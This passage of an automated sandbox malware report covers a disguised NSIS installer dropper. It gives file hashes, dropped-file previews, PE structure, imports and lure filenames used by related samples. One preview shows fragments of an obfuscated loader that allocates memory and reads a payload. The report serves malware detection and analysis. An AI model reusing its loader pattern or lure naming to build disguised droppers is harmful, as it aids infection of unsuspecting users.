                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):963
                                                          Entropy (8bit):5.007492216176859
                                                          Encrypted:false
                                                          SSDEEP:12:tkW5nd6CsGkMyGWKyGXPVGArwY3NIFa5HEGYArpv/mOAaNO+ao9W7iN5zzkw76kY:qW9dRNuKyGX85ihvXhNlT3/7ucgWro
                                                          MD5:587EEC1777436EC11D208488B9A0E4DD
                                                          SHA1:04A8AB8241918700734AE0D31A7BDF8460A23AAE
                                                          SHA-256:F084AE654930DED55F1C1943BF2B6DA3559D99874F0F8B5D47A1E62EF1D8D676
                                                          SHA-512:2F46655E3333F404BDA9B0D6B0EBB51B25AC3E5B550A11D029E73FD7AE7F0351B8ED7EF33E195C3764CEAC8D2C06ED796A02DB934661F00DDD5623796B500274
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{. "geoplugin_request":"79.127.132.20",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Ashburn",. "geoplugin_region":"Virginia",. "geoplugin_regionCode":"VA",. "geoplugin_regionName":"Virginia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"39.0469",. "geoplugin_longitude":"-77.4903",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                          C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):45
                                                          Entropy (8bit):4.7748605961854445
                                                          Encrypted:false
                                                          SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                          MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                          SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                          SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                          SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                          C:\Users\user\AppData\Local\Temp\bhv2462.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8dbb486c, page size 32768, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):41943040
                                                          Entropy (8bit):1.4125878529581972
                                                          Encrypted:false
                                                          SSDEEP:24576:N+z3CNmtPu9MkoMj7Gyt8mVFPDQgGESg9jokoiGse7rCou2d0lfoBg:7mI9lB7GytBPDQgGwMu2
                                                          MD5:1651D3B37A031B7C1941CFDB78EEDC69
                                                          SHA1:3D22301D718493CC173041DF5C51275AC3419FC7
                                                          SHA-256:36C3B7BBA94CE95A7BEAB9252ABC46211E65CC06D8386CEF0DE6F1ADE85A0755
                                                          SHA-512:E96741D2073EA19A8F4EE686EA719596D904498C5CA3D6FD6A53E91BBC3F4F20FD1EB079485387FE2438FC5DAE5D5383C17C13BAA1CA6E306738E4AE7DFC7DFE
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..Hl... .......rH...........*...y......................d.*.L.../9...|i.:9...|..h.,.L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... ............|A.............................................................L...........................................................................................................................N...:....y!.................................Y..]:9...|......................:9...|..................L........#......h.,.L...................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):5.659026618805001
                                                          Encrypted:false
                                                          SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                                          MD5:9625D5B1754BC4FF29281D415D27A0FD
                                                          SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                                          SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                                          SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                                          • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                                          • Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious, Browse
                                                          • Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious, Browse
                                                          • Filename: Requesr for quotation-sample catalog.vbs, Detection: malicious, Browse
                                                          • Filename: Requesr for quotation-sample catalog.vbs, Detection: malicious, Browse
                                                          • Filename: Zahteva za ponudbo #U2013 Katalog vzorcev.vbs, Detection: malicious, Browse
                                                          • Filename: Zahteva za ponudbo #U2013 Katalog vzorcev.vbs, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmc.ini

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):27
                                                          Entropy (8bit):4.134336113194451
                                                          Encrypted:false
                                                          SSDEEP:3:iGAeSMn:lAeZ
                                                          MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                          SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                          SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                          SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                          Malicious:false
                                                          Preview:[Access]..Setting=Enabled..

                                                          C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..

                                                          C:\Users\user\classrooms\Absented127\traumatically.fra

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288114
                                                          Entropy (8bit):1.2434502885411884
                                                          Encrypted:false
                                                          SSDEEP:768:6F9p3t3IrbTwRROFJIPoWbqZKVaCGQUOVKxKEhhKjarIY5LJyyL0bbQUMEQOUI5x:uq2MfCdaCMrG7kLgaRkjpZOzNBK
                                                          MD5:6A1E16CBA1445D499AFE9EB6D8F6BEFC
                                                          SHA1:189C2E83500790659F5BD0D2D7B21823A6D7D93F
                                                          SHA-256:C800DF5007C632E89B1F61A7592F36E967BCAA8C37079C9BBDD2EDBBC5381A61
                                                          SHA-512:81516187AAF31672E2B10183E73A3229FBD638B574E42C9B3ACC2388B4CFBA1F1C7184F9FE69521FA606306004697506A2783E1C98D3B458A18C4EEC8A0694B2
                                                          Malicious:false
                                                          Preview:..............................W..............................R..........U..............u........-..........................................k...................k..../...................N......................................H.W..O............................................................... .....................................................................................'.......................................a...........h.............................. ........................................g.....................$....................T....9..........................................................................................d..............<......-......................................................0..................... ..............=........8.......................................g................3..................B.....................?......................................................................^.......................s..........................................

                                                          C:\Users\user\classrooms\Alkoholisters26.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with very long lines (377), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):377
                                                          Entropy (8bit):4.247473738841439
                                                          Encrypted:false
                                                          SSDEEP:6:2Vzd6gMnDQ9RF3T/S4AWoPt+1bMd+htV3iRGx4FVw0vYMXJ6KjYFeNgsW9+KT83N:2dsojL6PqbMdeViRGxQPDceNgsEmqBA
                                                          MD5:A057E0CE882029EA5B564143C84FC55A
                                                          SHA1:A86F7916A00CF922E1B01B69212029CF52037407
                                                          SHA-256:C863E9D0414C2E8C1CF7014287D672DDCAEF38CF1ED91278BB9891820044251A
                                                          SHA-512:8D606D6ED91E274AFAE731617751DB4C90334D572AD236F6C0490F6DF0C1CFDC2F17B8BDE97A5DFAFF5B5C04AE7EED9A23053A9A5758CDC1E84A2F786946A79B
                                                          Malicious:false
                                                          Preview:retveindbydendes plade lickety befavor varmeovnens.misprejudiced unreprieved tilgangsreguleringernes lossepladsernes stormpisket borg,taabeligheds marya vestigium rimy resultattavles processtyringer.departmentalization puerperalism afsaltendes valgerd stigningstakters brookier thyreoideal,labret ungkreatur omvej kohrerende bugtedes,designendes sadomasochists beskeler xylyls,

                                                          C:\Users\user\classrooms\Bangladeshers.Fag

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:GTA audio index data (SDT)
                                                          Category:dropped
                                                          Size (bytes):274165
                                                          Entropy (8bit):7.543392897052076
                                                          Encrypted:false
                                                          SSDEEP:6144:8Xg71tfBj9TJpD37tDWCNSO8l6r9s+n5wQo36CYZn1eqi:8yBRVzXNSOmosAwZ3UZ1eqi
                                                          MD5:C7BF2D747D1DEFECBBF177E8CA8E0A60
                                                          SHA1:A2A56F36391500C40F35B2C806E6DBCCF9034306
                                                          SHA-256:3CAE47C75BBF9311C3966163F767AFD5CE2B73D88CADC5B482487B4DF1074AFA
                                                          SHA-512:FD07DE0A858663BC1A83473AA7D7FD575F95EB8D4B9390B7270C4D2F3B42BB1788F8F46EAABD2441EA16C62330FCDABD1AA3B582F94EAD33B5861EDE0F69F580
                                                          Malicious:false
                                                          Preview:.........`...............S.............o................333......."..YYY...........................!.................U.........22...............................u......gg.........................66..............$$...%%%%..........o........]].........E.........jj............m...```........................................6....JJJJJ.........&.A............~~~~.....................................?................................................../////.....`.....0000...H.......<<<<....uu......D..........<<..................................!.........................................F...........~...........................L..............f.....................Z.f....(...........######...................h..........AAAAAA.........1...................................s......'....G.......b..............N........................qq.........._...........[[.f.d.......................................&.....XX...................wwww........................c.b................@....................*....e.....

                                                          C:\Users\user\classrooms\Predive.Arb

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13602
                                                          Entropy (8bit):4.479079605925653
                                                          Encrypted:false
                                                          SSDEEP:192:BKg1zAFz9m8cE1cfe6o9aRAeo/tGTscitMzDmo6FlkBTFlvnb9uWIK5HStmkd3e:EFzg8cE1AeFAAJusBgWlA5tnbQWIwy0
                                                          MD5:172AA18E4C5835ED9B5C81D0E4A1BCCF
                                                          SHA1:1BE5B60F8DC4F7D0A20E9923E76E0F3FE050B4A4
                                                          SHA-256:CDE7CF0875155BB564A50F409D0BE820FA9CCE7C83282A7BAE4A66FA9414B63E
                                                          SHA-512:F9A6E0920622AE8CD164125ABD17EC4245561F5EE0599AEB3922007EACA2CB2AB82EF971B7540CBAD28C7089D7E2C33130EE0A4163BA3AF90B83E0CF49D925E9
                                                          Malicious:false
                                                          Preview:..............i..NN........}..rrrr..........M...................+.................1.f..........k...e...r...n.KKe...l...3...2...:..):...C.PPr...e...a...t...e...F...i.ZZl.y.e..]A...(...m... ...r.. 4... ...,..= ...i... ...0.r.x.KK8...0..*0...0...0...0...0.v.0...,... .d.i... ...0.nn,... ...p... ...0...,... .>.i... .m.4...,... ...i... ...0._.x...8...0...,... .[.i... ..v0...)...i.......r...8...q...k...e...r...n...e...l..63...2..c:...:...S..Re...t...F...i...l.3.e...P...o.3.i..Yn.'.t.a.e...r...(...i.S. ...r...8...,... ..mi... ...2...3...0...1...2... .//,..? ...i... ...0...,...i... ...0...)...i.....NNr...4...q..Rk...e...r...n...e...l...3...2...:..W:...V...i...r...t...u...a...l...A...l...l..oo...c...(...i... ...0...,...i... ...7...3...2...4...8...7...6...8...,... ...i... ...0...x...3...0...0...0...,... ...i... ...0..`x.kk4...0...).K.p.......r...2...q...k...e...r...n..:e...l...3.442...:...:...R...e...a...d...F...i..[l...e...(...i... ..qr..A8...,... ...i... ...r...2...,... ...i... ...7...3...2...4

                                                          C:\Users\user\classrooms\gutterblood.fri

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):483068
                                                          Entropy (8bit):1.2559621016997755
                                                          Encrypted:false
                                                          SSDEEP:1536:Ts8u8aVK1ZlzjOxDzNWfy52aTmhK55zGW:K8sK1CnI855zj
                                                          MD5:978130B080454EE75826E94EEFAC0DB6
                                                          SHA1:EAAE2B3999D26409C2940341400BBBAB48469E17
                                                          SHA-256:3BBDA07C56DE4470422589DD83FE0A6577965873EFA5C8E5E83FE4F1AA63DCDE
                                                          SHA-512:82495569F36BBDAAD1148F0A690D46FA72473525529F0358DF93F50BE08AC15CFA4FCB80606C42EF8A53C0CCFF4B2D0DAEFA04C58D9C401DF53A82911D91F69E
                                                          Malicious:false
                                                          Preview:...............................................k.........x.................................K.................3.......................$.....>.....?.............;....(................................e..............G........I...............O...........................5..................X......................................................:...........*.I..o..............................................I............................................................................................................................."......................s.....................................................*..........3..r..............................................................................................................(...................................................................]...P.......................................:.....................?.......................................f............t.....................................................................E...........

                                                          C:\Users\user\classrooms\inexorable.aut

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):398475
                                                          Entropy (8bit):1.248847086664137
                                                          Encrypted:false
                                                          SSDEEP:768:bkh4Sjk4H7mPNEmlFSqrgoqOZzoC4SaD7V3dMpWrsmTKup6S0HoEoe+gndJDu4u/:+rmPjodMgqouK0WcnEuKSZoP2XkqBO
                                                          MD5:F1CF1E2735A25FA7063AD6B83B19FC89
                                                          SHA1:FE722248A797FE002769CA18A81576296AB22403
                                                          SHA-256:CA79D9C3C8F6BCA1C2312B3B03625465720F77FA069DF8822C001852D8320174
                                                          SHA-512:C1E23B6F6F1C61434BE9B761D2012E3EBDBA7F570A81B014762EA132F5DE2AB99E0951307536640F546AFFC69759C0EFF0F4D0F58771F18EE2F3E2C984FABD95
                                                          Malicious:false
                                                          Preview:.....................................................E........*#......................................F............................I...........................................................................0.......................................u..........&............................f..........|...[......................S..........y..................r..............#.........[...................................7.........................t............................................x.............................|..............M.........................................................................................Hq..................................%.....................................................................................................\...................@..;..................................................q..@..................................K.............y........7.........2...........................l....................................S............................

                                                          C:\Users\user\classrooms\milieustyrelses.byg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217626
                                                          Entropy (8bit):1.2578603206013297
                                                          Encrypted:false
                                                          SSDEEP:768:XMKYdIEXJwxgkl3KvWaEjMQdp2TWrOr8URnzMazeE3hLOPf9BYgTtTkYCkkpMkNx:FlaopMDh0BmrkYin5Q
                                                          MD5:3F90DDDD63AE098601831A6E980C14A0
                                                          SHA1:4886FAB60F9408EA1A4AEB3ECD0DDFF3EE5CB6E4
                                                          SHA-256:AC86AC0C331BD0885EFF6138AA0BFCBA447DCC32BF53C764A3B350A24C121C27
                                                          SHA-512:54A5A11ACF41B7E0F8AD0765637FC9A0F376C61CA3630820F6C80424BC6B849999677EBA2046BCC2586A5081CA26E8C01338306E0E3D55CBAB9FD8A8830D07FA
                                                          Malicious:false
                                                          Preview:.......K..\....,............c........................#................v..5......................r................0...............................................@.................................|...N...I........b...l.................................v....................s....................................................P......N.........2................5..................................................................M.....Q..............i...H.............s....................M.................................................B............<..................=.........^..........'.....(......e...........................................................y................................................j...7............,...................................................................N^.....J...........................X............%.........=.............................4..............................gy...................................~.......... ..}..................................

                                                          C:\Users\user\classrooms\vennekredse.som

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 10092776, columns 0
                                                          Category:dropped
                                                          Size (bytes):424413
                                                          Entropy (8bit):1.2492169177560173
                                                          Encrypted:false
                                                          SSDEEP:768:7Gx4c5hFkUmQbJLYe2jSB5rZDPdg2xnkwzIGn59Yrg/VhmvCQyjVjCC51kotL6PX:m59NMhxMJVZWiEeZnw/2zso55+EhOt
                                                          MD5:3DF6AD4FBABFD56702AF1CF7EBA6B9CB
                                                          SHA1:B473DD3797EC446C80EBAFC30F749939D1BAE334
                                                          SHA-256:08539C762BBA9CAED2AD7EA548ED678763ECFC8C4A2162658301CA7D5E17E24F
                                                          SHA-512:D7FA42CC6C6C8F49E74BD0A42B393BD23434601444C99C7F42F2D9AE59701ACFB9FB5F8700638A1C6B931810DB93823C7734393221E854881349D93DD44F30E7
                                                          Malicious:false
                                                          Preview:....................8..........@.............7........m.....V......(...............t...................p......................o........!.....................................................................................................r.....S..............................................q..L...d...............{................@...........................................................................).......................................................u............................................................................................ez.............B........}................$..........................c........................O.....p.......h.......................................Q.........................................X.................o....................?............................q.......<....................H.........U.................I.......................................................................Z.............................................}...}......

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.521658981788193
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File size:814'515 bytes
                                                          MD5:50ad24c74502951d0bec1507ca050c46
                                                          SHA1:392235b1cf28c1e5e5c4ce98922b472d80fb8d0c
                                                          SHA256:e4ed3892cc2c77e7de57a5fc47040118740b1a672747f72193ed065570a55b38
                                                          SHA512:e06ac807482380f9b1986f1b064ee215716095aac4350d9427baeeda5a6bfc4a302b048788a3d187e9131620f032e0a6476cbff5f6db9eb2420a56ecbaade5d8
                                                          SSDEEP:24576:twh/C6tZbwDaudTLF9AMWR9hoRR7jKzjrh:twE6tZ6dT/A5ORlKzj1
                                                          TLSH:3D0512457A30E586C6BC863055B3D46C8A364D346C722A8F77B4BB8C3972749F29F24E
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...b..Y.................d....:....

                                                          File Icon

                                                          Icon Hash:8c07010123078f11

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x403350
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x597FCC62 [Tue Aug 1 00:33:38 2017 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                          Entrypoint Preview

                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [esp+14h], ebx
                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                          mov dword ptr [esp+1Ch], ebx
                                                          call dword ptr [004080A8h]
                                                          call dword ptr [004080A4h]
                                                          and eax, BFFFFFFFh
                                                          cmp ax, 00000006h
                                                          mov dword ptr [007A8A2Ch], eax
                                                          je 00007F01C8CFA413h
                                                          push ebx
                                                          call 00007F01C8CFD6A9h
                                                          cmp eax, ebx
                                                          je 00007F01C8CFA409h
                                                          push 00000C00h
                                                          call eax
                                                          mov esi, 004082B0h
                                                          push esi
                                                          call 00007F01C8CFD623h
                                                          push esi
                                                          call dword ptr [00408150h]
                                                          lea esi, dword ptr [esi+eax+01h]
                                                          cmp byte ptr [esi], 00000000h
                                                          jne 00007F01C8CFA3ECh
                                                          push 0000000Ah
                                                          call 00007F01C8CFD67Ch
                                                          push 00000008h
                                                          call 00007F01C8CFD675h
                                                          push 00000006h
                                                          mov dword ptr [007A8A24h], eax
                                                          call 00007F01C8CFD669h
                                                          cmp eax, ebx
                                                          je 00007F01C8CFA411h
                                                          push 0000001Eh
                                                          call eax
                                                          test eax, eax
                                                          je 00007F01C8CFA409h
                                                          or byte ptr [007A8A2Fh], 00000040h
                                                          push ebp
                                                          call dword ptr [00408044h]
                                                          push ebx
                                                          call dword ptr [004082A0h]
                                                          mov dword ptr [007A8AF8h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebx
                                                          push 0079FEE0h
                                                          call dword ptr [00408188h]
                                                          push 0040A2C8h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e30000x31350.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x63c80x6400c9574a66dc77d8f1daec393ec45a9340False0.6766015625data6.504099201068482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xa0000x39eb380x600b58a1c46e0546d467ecde7b7f51a5ac7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x3a90000x3a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x3e30000x313500x314001a5e30c8ed816e683bafacf9b70f6fb3False0.45309029980964466data5.127644529748264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x3e33880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.26761209038211287
                                                          RT_ICON0x3f3bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3500105108261509
                                                          RT_ICON0x3fd0580x8ea4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9976996385146237
                                                          RT_ICON0x405f000x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.37846580406654345
                                                          RT_ICON0x40b3880x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.367737364194615
                                                          RT_ICON0x40f5b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4378630705394191
                                                          RT_ICON0x411b580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.47373358348968103
                                                          RT_ICON0x412c000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5426229508196722
                                                          RT_ICON0x4135880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.625
                                                          RT_DIALOG0x4139f00x120dataEnglishUnited States0.5138888888888888
                                                          RT_DIALOG0x413b100x11cdataEnglishUnited States0.6056338028169014
                                                          RT_DIALOG0x413c300xc4dataEnglishUnited States0.5918367346938775
                                                          RT_DIALOG0x413cf80x60dataEnglishUnited States0.7291666666666666
                                                          RT_GROUP_ICON0x413d580x84dataEnglishUnited States0.7348484848484849
                                                          RT_VERSION0x413de00x230dataEnglishUnited States0.5464285714285714
                                                          RT_MANIFEST0x4140100x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
